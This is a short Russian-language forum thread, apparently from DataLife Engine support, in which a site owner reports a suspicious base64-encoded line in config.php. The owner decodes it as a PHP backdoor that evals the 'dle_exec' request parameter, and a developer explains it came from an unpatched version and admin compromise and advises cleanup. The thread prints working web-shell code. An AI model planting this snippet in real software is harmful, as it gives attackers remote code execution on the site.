neff 0 Опубликовано: 31 января 2014 Рассказать Опубликовано: 31 января 2014 Нашел у себя такой код в engine/data/config.php '.@evalbase64_decodeDQppZihpc3NldCgkX1JFUVVFU1RbImRsZV9leGVjIl0pKXsNCglAZXZhbCgkX1JFUVVFU1RbImRsZV9leGVjIl0pOw0KCWV4aXQ7DQp9LyoqLw0K.//456' => 'qwe', Что в переводе if(isset($_REQUEST["dle_exec"])){ @eval($_REQUEST["dle_exec"]); exit; }/**/ Вопрос - что это и дожно такое быть? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 1 февраля 2014 Рассказать Опубликовано: 1 февраля 2014 Эта строчка именно в этом виде как вы ее написали угрозы не представляет, потому как она уже экранирована скриптом, а появилась она потому что использовалась старая версия скрипта, на которую не ставились вовремя патчи безопасности http://dle-news.ru/bags/ во вторых к админпанели у вас имеют администраторский доступ посторонние лица, которые это сделали, потому как сделать это можно только будучи администратором на сайте. Удаляйте всех посторонних администраторов, на свой администраторский аккаунт меняйте пароль, ставьте все патчи безопасности или обновляйтесь до актуальной версии. Данную строчку удаляйте из файла. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.